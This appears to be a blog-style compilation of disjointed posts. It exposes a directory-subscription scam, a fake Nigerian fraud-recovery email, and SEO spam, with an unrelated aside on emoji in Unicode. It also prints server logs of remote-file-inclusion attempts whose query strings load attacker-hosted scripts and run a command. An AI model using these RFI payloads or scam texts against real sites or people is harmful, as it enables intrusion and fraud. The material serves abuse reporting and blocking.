“World Business Guide” place a lot of emphasis on the fre update, but not on the fact that signing and faxing their document will bind the

The signing of this document represents the acceptance of the following conditions and the conditions stated in “the terms and Conditions for insertion” on webpage: www.world-businessguide.com. The signing is legally binding and gives you the right of an insertion In the online data base of the world business guide, which can be accessed via the internet. A cd rom with worldwide businesses is Granted, all in accordance with the contract conditions stated in “the terms and conditions for insertion” on webpage: www.worldbusinessguide.Com. The validation time of the contract is three years and starts on the eighth day after signing the contract. The insertion Is granted after signing and receiving this document by the service provider. I hereby order a subscription with service provider International directories ltd “world business guide”. I will have an insertion into its data base for three years. The price per year is euro 995. The subscription will be automatically extended every year for another year, unless specific written notice is received by the service Provider or the subscriber two months before the expiration of the subscription. Your data will be recorded. The place of jurisdiction In any dispute arising is the service provider’s address. The agreement between the service provider and the subscriber is governed by the Conditions stated in “the terms and conditions for insertion” on webpage: www.world-businessguide. com

The spam was sent from nfo@bestorganization4you.com

World Business Guide’s apparent contact details are is

For some reason the business uses a PO Box, rather than their own business address.

But it is worth noting that “The World Business Guide is a product of International Directories Group Ltd., C/ Azcona, 58, local · BOX 252 · 28028 · MADRID · SPAIN” which again are reluctant to provide a real address. Also they apparently were once EU Business Services Ltd Trading As World Business Directory but have changed their name.

They registered the domain name wbgtoday. com in April 2009, under the following address

It has been identified by other businesses as being a scam.

These additional characters are used to depict emotions and other symbols in a similar manner to SMS emoticons.

Rather than being combinations of characters, such a , which is entered as a : followed by a ) ,  to represent a smiley in the Latin character sets, there is a movement to create a whole range of  new symbols, into Unicode, which include colour and animation.

At present, they are exchanged in SMS messages by using privately agreed character codes, but there is pressure to add these new emoji ideographs into the Unicode specification.

Some of the key problems that adding Emoji to the Unicode standards would present include:

1. Adding shapes to Unicode, which has carefully remianed indepentant of how glyphs are drawn
2. Adding colour requirements to Unicode, which again has had no logical need to specify colours for characters
3. Adding the concept of animation definitions to characters, which is well outside the range of a character set definition

This is a particularly noxious scam, as the spammer is targeting people who are already victims of fraud. Presumably the organisers feel that if somebody is gullible and greedy enough to fall for one fraud, they are an ideal candidate for another.

The scammers claim to be from a “Nigerian Government Reimbursement Committee” but host their web site at itgo.com (also known as freeserver.com) who provide free web hosting. The pages that they present are almost plausible, apart from the fact that they carry advertisements from the hosting company and use free gmail addresses.

Their pages include wonderful statements such as

As regards these ongoing developmental strive; we have over 210 suspects at hand, 135 in Kirikiri prison here in Nigeria. While many are awaiting trial, we are still in search of others, who think they are wise, and hope that you will assist by giving any vital information that could lead to the apprehension of these hoodlums.

We shall be waiting to hearing from you been certain that you were truly scammed by a Nigerian and you have proves to back your claim.
cyberfraud.department@gmail.com

The text of the scam email is as follows:

Attention:

This email is not in any manner directed to you, but its purposely and specifically directed to Nigeria Scam victims. . However, if you have fallen for Nigerian Scams, do not hesitate to contact us or visit our website for more
details on how we can help.

We shall be waiting to hearing from you been certain that you were truly scammed by a Nigerian and you have proves to back your claims. Please read the full report at our website: http://www.nigeria-scamvictims.itgo.com/

Yours faithfully,
Brian Adams
Nigerian Government Reimbursement Committee

This particular specimen claims to have been sent by Brian Adams at baantinigeriascams@gmail.com, but other examples can be found from somebody calling himself David Bamko.

Isn’t it amazing that the supposed anti-fraud parts of the Nigerian government need to use gmail addresses an free hosting services supported by advertising and pop-ups?

Is it possible that they ask for all the information used in one fraud, to duplicate the fraud?

Amazingly, considering that they promise worldwide search engine optimization, Dr. Marc Schneider and his company Global Vibration Inc., can only be found as being mentioned on sites relating to spamming.

I am Dr. Marc Schneider and I work for Global Vibration Inc. in Washington DC ( Tel: 1 202-787-3989 ) – I would like to speak with the person in charge of your international clientele. Who is my contact? Who should I speak to??

In fact, after visiting http://www.myclients.web.site.co.uk, I have noticed that your website cannot be found on foreign search engines (I tested it on Hispanic search engines, German search engines, Asian search engines, etc.) Our company is specialized in multilingual search engine promotions in 28 languages . From the Japanese Google to the German Yahoo, from the AOL in Spanish to the MSN in Chinese, we can show you how to develop a true international online presence by promoting your website on foreign search engines.

Let us show you how to develop a presence on the multilingual web without having to translate your website: It is not necessary to translate your website in order to submit to foreign search engines, however, you need to have at least 1 page in Japanese optimized with Japanese keywords and meta tags in order to submit to Japanese search engines, at least 1 page in Spanish optimized with Spanish keywords in order to submit to Hispanic search engines and so on…

I strongly suggest that you watch our online presentation which will explains clearly how to get top rankings on foreign search engines with only 1 entry page per language (click on the following link or copy-paste it into your web browser): http://www.mplw.net/demo

From the Japanese Google to the German Yahoo, from the AOL in Spanish to the MSN in Chinese, get users to find your website when searching with YOUR KEYWORDS in their Native language.

Please call me at 1 (202)-787-3989 or email me and let’s work on giving your website the true international exposure which it deserves to have with foreign native online users!!

Regards,

Marc Schneider, Ph.D.
Marcs@mplw.net
_____________________

GLOBAL VIBRATION INC.
1250 Connecticut Ave N.W. Suite 200
Washington, DC 20036 USA
TEL:1 (202)-787-3989 – FAX: 1 (202)-318-4779
http://www.mplw.net :
Multilingual Search Engine Promotion Services since 1999.

They don’t seem to have a presence at all on Japanese google.

They claim to have been doing Multilingual Search Engine Promotion Services (SEO) since 1999, but a whois query of their domain mplw.net shows a creation date of 04 Aug 2007 16:13:29

Many other companies are receiving the same spam for example, see http://www.tmcowners.com

For such a multi-nationally aware company, sending spam to the UK, Global Vibration Inc. haven’t even been capable of putting their own phone number in the standard international format, presumably because they are not aware that anyone outside the USA has to dial in international number to reach them.

Associated with their domains are the following administrative email addresses

• urls@mseo.com
• mauispirit@gmail.com

88.242.239.182 - - [27/May/2007:18:40:29 +0100] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://xyu.phpnet.us/xyu.dat?&list=1&cmd=id HTTP/1.0" 403 327 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"


phpnet.us which provides the hosting does not give a direct way for unregistered users to contact them regarding abuse, but I have used the registered email address at hostorgadmin@googlemail.com to let phpnet.us know that there service is being used by script kiddies.

The originating IP address belongs to the the familiar TurkTelekom, who seem to have become the home of some script kiddies.

inetnum: 88.242.64.0 – 88.242.255.255
netname: TurkTelekom
descr: TT ADSL-alcatel dynamic_aci

As usual, their abuse account bounced a the complaint.
It looks like another of their IP ranges will have to be blocked.

88.233.150.109 – - [21/May/2007:21:39:02 +0100] “GET /index.php?mosConfig_absolute_path=http://genchackers.net/tool20.dat?&list=1&cmd=id HTTP/1.0″ 403 283 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”

presumably it is a script kiddy, who has no idea how old the exploit is, but these reports of a year ago will provide an idea:

• http://osvdb.org/displayvuln.php?osvdb_id=27010
• http://xforce.iss.net/xforce/xfdb/27906

The listed abuse reporting email address bounced my complaint, for the originators IP range 88.233.0.0 – 88.233.255.255

netname: TurkTelekom
descr: TT ADSL-alcatel_gay

So, all of its IP ranges will have their access blocked.

As will the range 212.175.205.0- 212.175.205.255 which is hosting genchackers.net

The hacker script that is hosted at genchackers.net was ripped off from http://georgiaeliteallstars.com although they seem to have taken the script down now.

As it stands, the script can’t work for the kiddie that downloaded it, but I don’t think it is appropriate or ethical to explain how to fix it!

Various IP addresses are being used, which suggests a botnet, but as they are all trying to push links on the same page to the same sexually explicit, and probably illegal sites, it is fair to assume that they are linked.

The IP addresses of these attacks so far are:

24.199.119.150
24.22.218.231
24.230.136.95
87.245.109.208
75.27.187.192
88.6.79.188
172.192.85.173
200.185.242.156
201.13.92.43
216.76.227.127

Additional compromised IP addresses which try to add their spam to the Japanese interest rate article for 24^th April 2007

24.14.156.99
69.1.40.80
71.63.151.152
75.57.135.91
75.52.255.169

Access from the same IP address (64.28.178.66) repeatedly tries to access random blog pages, some of which don’t even exist.

Here’s an extract from the log…

64.28.178.66 – - [10/Oct/2006:20:17:50 +0100] “GET /blog/?p=13 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; SV1; .NET CLR 1.1.4322)”
64.28.178.66 – - [10/Oct/2006:20:37:34 +0100] “GET /blog/?p=21 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1″
64.28.178.66 – - [10/Oct/2006:21:52:26 +0100] “GET /blog/?p=6 HTTP/1.1″ 403 279 “-” “EVE-minibrowser/”
64.28.178.66 – - [10/Oct/2006:22:16:38 +0100] “GET /blog/?p=14 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5″
64.28.178.66 – - [10/Oct/2006:22:22:55 +0100] “GET /blog/?p=11 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)”
64.28.178.66 – - [10/Oct/2006:22:53:52 +0100] “GET /blog/?p=34 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)”
64.28.178.66 – - [10/Oct/2006:22:54:48 +0100] “GET /blog/?p=22 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Maxthon; iOpus-I-M; SV1; .NET CLR 1.1.4322)”
64.28.178.66 – - [11/Oct/2006:00:34:53 +0100] “GET /blog/index.php?p=30 HTTP/1.1″ 403 288 “-” “OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer”
64.28.178.66 – - [11/Oct/2006:01:29:30 +0100] “GET /blog/index.php?p=30 HTTP/1.1″ 403 288 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; [eburo v1.3]; .NET CLR 1.1.4322)”
64.28.178.66 – - [11/Oct/2006:01:31:14 +0100] “GET /blog/?p=10 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)”
64.28.178.66 – - [11/Oct/2006:03:09:43 +0100] “GET /blog/?p=18 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (firatnyvr; MSIE 6.0; ; SV1)”
64.28.178.66 – - [11/Oct/2006:04:50:30 +0100] “GET /blog/?p=14 HTTP/1.1″ 403 279 “-” “OmniExplorer_Bot/3.11c (+http://www.omni-explorer.com) WorldIndexer”
64.28.178.66 – - [11/Oct/2006:12:01:03 +0100] “GET /blog/?p=13 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041116 Firefox/1.0 (Ubuntu) (Ubuntu package 1.0-2ubuntu3)”
64.28.178.66 – - [11/Oct/2006:12:18:56 +0100] “GET /blog/?p=21 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (cOsmO&SoNnE; MSIE 6.0; Windows XP)”
64.28.178.66 – - [11/Oct/2006:13:33:53 +0100] “GET /blog/?p=6 HTTP/1.1″ 403 279 “-” “LinkWalker”
64.28.178.66 – - [11/Oct/2006:13:57:28 +0100] “GET /blog/?p=14 HTTP/1.1″ 403 279 “-” “Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)”
64.28.178.66 – - [11/Oct/2006:14:04:21 +0100] “GET /blog/?p=11 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firechicken/1.0″
64.28.178.66 – - [11/Oct/2006:16:39:33 +0100] “GET /blog/?p=2 HTTP/1.1″ 403 279 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1″

Does anyone know anything about this outfit?